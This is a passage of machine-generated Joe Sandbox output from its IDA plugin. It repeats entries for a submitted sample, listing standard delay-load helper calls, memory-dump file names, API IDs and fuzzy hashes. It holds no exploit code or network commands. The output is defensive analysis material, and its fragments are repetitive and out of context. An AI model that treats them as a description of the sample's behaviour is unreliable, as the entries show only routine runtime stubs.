                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: PDu<
                                                                                                                        • API String ID: 1269201914-576538559
                                                                                                                        • Opcode ID: e019fb2a1ac38a81aed955ea3ec02d0570d51ec6bad5fbc2188ac957e91e44e0
                                                                                                                        • Instruction ID: c0125510b6aba163492ce518bda004608386584a37743e50a43e09f56464d9e5
                                                                                                                        • Opcode Fuzzy Hash: e019fb2a1ac38a81aed955ea3ec02d0570d51ec6bad5fbc2188ac957e91e44e0
                                                                                                                        • Instruction Fuzzy Hash: E5B012C1A591007C310821342E07D3F010EC1C7F14330703FF414F8681BC406D050431
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE1E3
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-3618818622
                                                                                                                        • Opcode ID: 4de8c10f10d3f13712c49273eabee6436ee67efd88a2e8b692a289db40cb932a
                                                                                                                        • Instruction ID: f5edbd804ea1f4c9700f1daa7eae7abaadfbb2117b44c45a1b9dda248f948d73
                                                                                                                        • Opcode Fuzzy Hash: 4de8c10f10d3f13712c49273eabee6436ee67efd88a2e8b692a289db40cb932a
                                                                                                                        • Instruction Fuzzy Hash: 5DA012D1159101BC300811011D42C37010CC4CAB10330642DF806E8180584438010430
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE1E3
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-3618818622
                                                                                                                        • Opcode ID: 9b63004ee8592e51d0d7d8d4263e584ca20af5852556f0055c4d26b6fba12c23
                                                                                                                        • Instruction ID: f5edbd804ea1f4c9700f1daa7eae7abaadfbb2117b44c45a1b9dda248f948d73
                                                                                                                        • Opcode Fuzzy Hash: 9b63004ee8592e51d0d7d8d4263e584ca20af5852556f0055c4d26b6fba12c23
                                                                                                                        • Instruction Fuzzy Hash: 5DA012D1159101BC300811011D42C37010CC4CAB10330642DF806E8180584438010430
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE1E3
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-3618818622
                                                                                                                        • Opcode ID: 4f0ac1be3ab95d75c7d2438e6e984b2764250bf5ca6b22b8ac781ccd8fb4457d
                                                                                                                        • Instruction ID: f5edbd804ea1f4c9700f1daa7eae7abaadfbb2117b44c45a1b9dda248f948d73
                                                                                                                        • Opcode Fuzzy Hash: 4f0ac1be3ab95d75c7d2438e6e984b2764250bf5ca6b22b8ac781ccd8fb4457d
                                                                                                                        • Instruction Fuzzy Hash: 5DA012D1159101BC300811011D42C37010CC4CAB10330642DF806E8180584438010430
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE1E3
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-3618818622
                                                                                                                        • Opcode ID: f0b05794114c78698d10a133eec646de909448145949f36a50fc95b8b05167db
                                                                                                                        • Instruction ID: f5edbd804ea1f4c9700f1daa7eae7abaadfbb2117b44c45a1b9dda248f948d73
                                                                                                                        • Opcode Fuzzy Hash: f0b05794114c78698d10a133eec646de909448145949f36a50fc95b8b05167db
                                                                                                                        • Instruction Fuzzy Hash: 5DA012D1159101BC300811011D42C37010CC4CAB10330642DF806E8180584438010430
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE1E3
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-3618818622
                                                                                                                        • Opcode ID: 012bc5f73cc41d3ada5ded622e4d55f496e86bd78256f34779b978fb8b65d0cd
                                                                                                                        • Instruction ID: f5edbd804ea1f4c9700f1daa7eae7abaadfbb2117b44c45a1b9dda248f948d73
                                                                                                                        • Opcode Fuzzy Hash: 012bc5f73cc41d3ada5ded622e4d55f496e86bd78256f34779b978fb8b65d0cd
                                                                                                                        • Instruction Fuzzy Hash: 5DA012D1159101BC300811011D42C37010CC4CAB10330642DF806E8180584438010430
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE1E3
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-3618818622
                                                                                                                        • Opcode ID: b2c5970bd998600230796ca49dd1eff99171268cba7a6a95bada341e19ef543d
                                                                                                                        • Instruction ID: f5edbd804ea1f4c9700f1daa7eae7abaadfbb2117b44c45a1b9dda248f948d73
                                                                                                                        • Opcode Fuzzy Hash: b2c5970bd998600230796ca49dd1eff99171268cba7a6a95bada341e19ef543d
                                                                                                                        • Instruction Fuzzy Hash: 5DA012D1159101BC300811011D42C37010CC4CAB10330642DF806E8180584438010430
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE1E3
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-3618818622
                                                                                                                        • Opcode ID: a7d67bc9111c3325c333d3ae6978d78da437328fe68384033487042623c1124f
                                                                                                                        • Instruction ID: f5edbd804ea1f4c9700f1daa7eae7abaadfbb2117b44c45a1b9dda248f948d73
                                                                                                                        • Opcode Fuzzy Hash: a7d67bc9111c3325c333d3ae6978d78da437328fe68384033487042623c1124f
                                                                                                                        • Instruction Fuzzy Hash: 5DA012D1159101BC300811011D42C37010CC4CAB10330642DF806E8180584438010430
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE1E3
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-3618818622
                                                                                                                        • Opcode ID: acdf619873fd6a241a7e3beff4604791c9884c7d7322b57f185e0b64962f4ae0
                                                                                                                        • Instruction ID: f5edbd804ea1f4c9700f1daa7eae7abaadfbb2117b44c45a1b9dda248f948d73
                                                                                                                        • Opcode Fuzzy Hash: acdf619873fd6a241a7e3beff4604791c9884c7d7322b57f185e0b64962f4ae0
                                                                                                                        • Instruction Fuzzy Hash: 5DA012D1159101BC300811011D42C37010CC4CAB10330642DF806E8180584438010430
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE1E3
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-3618818622
                                                                                                                        • Opcode ID: f39bce5581a9281d4088ebe1511ee26cc187696e249f67bc9440584b86bc0cd2
                                                                                                                        • Instruction ID: f5edbd804ea1f4c9700f1daa7eae7abaadfbb2117b44c45a1b9dda248f948d73
                                                                                                                        • Opcode Fuzzy Hash: f39bce5581a9281d4088ebe1511ee26cc187696e249f67bc9440584b86bc0cd2
                                                                                                                        • Instruction Fuzzy Hash: 5DA012D1159101BC300811011D42C37010CC4CAB10330642DF806E8180584438010430
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE1E3
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-3618818622
                                                                                                                        • Opcode ID: 52c11ed6829c5c33484e907dbdb10389e397b577eb63b5a8e840219c02e76b6e
                                                                                                                        • Instruction ID: f5edbd804ea1f4c9700f1daa7eae7abaadfbb2117b44c45a1b9dda248f948d73
                                                                                                                        • Opcode Fuzzy Hash: 52c11ed6829c5c33484e907dbdb10389e397b577eb63b5a8e840219c02e76b6e
                                                                                                                        • Instruction Fuzzy Hash: 5DA012D1159101BC300811011D42C37010CC4CAB10330642DF806E8180584438010430
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE1E3
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-3618818622
                                                                                                                        • Opcode ID: ca77f8b249ebc499ce56988b2ab4c924e9ef63ef7c67ec9af44c700b6cfedc90
                                                                                                                        • Instruction ID: f5edbd804ea1f4c9700f1daa7eae7abaadfbb2117b44c45a1b9dda248f948d73
                                                                                                                        • Opcode Fuzzy Hash: ca77f8b249ebc499ce56988b2ab4c924e9ef63ef7c67ec9af44c700b6cfedc90
                                                                                                                        • Instruction Fuzzy Hash: 5DA012D1159101BC300811011D42C37010CC4CAB10330642DF806E8180584438010430
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE580
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: Fjun
                                                                                                                        • API String ID: 1269201914-1717936292
                                                                                                                        • Opcode ID: 4b0bc8681fc3db66b5874b4f64b0d248a4d8be9b6ff4417b868b088e4523fc39
                                                                                                                        • Instruction ID: 80cc51831a10bad9f8b78b9a6719493c26cc2b495b11b81cf5a682b3cff65970
                                                                                                                        • Opcode Fuzzy Hash: 4b0bc8681fc3db66b5874b4f64b0d248a4d8be9b6ff4417b868b088e4523fc39
                                                                                                                        • Instruction Fuzzy Hash: DCA011C2AA8202BC300C22A02E02C3B020CC0CAF28330B82EF80AA8280A88028020830
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE580
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: Fjun
                                                                                                                        • API String ID: 1269201914-1717936292
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE51F
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: PDu<
